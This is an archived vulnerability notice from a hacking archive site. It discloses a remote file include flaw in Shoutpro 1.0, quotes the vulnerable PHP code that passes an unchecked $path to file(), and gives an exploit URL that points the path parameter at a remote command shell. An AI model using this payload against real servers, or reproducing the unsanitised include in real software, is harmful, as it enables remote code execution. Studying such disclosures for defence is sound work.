AOH :: HP Unsorted S :: B06-2995.HTM

Shoutpro 1.0 version - remote file include vulnerability



Shoutpro 1.0 Version - Remote File Include Vulnerability
Shoutpro 1.0 Version - Remote File Include Vulnerability



# SaVSaK.CoM | SpC-x - The_BeKiR |

# Shoutpro 1.0 Version - Remote File Include Vulnerability

# Risk : High

# Class: Remote

# Script : Shoutpro

# Credits : SpC-x

# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

# Code :

# include("config.php");
# include("functions.php");
# if ($path){
#       $ips = file("$path/lists/bannedips.php");
# } else {
#       $ips = file("lists/bannedips.php");
# }
# if (in_array($REMOTE_ADDR,$ips)) {
#       echo($bannedmessage);
#       die;
# }

# Vulnerable :

# http://www.victim.com/Shoutpro/include.php?path=Command-Shell 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.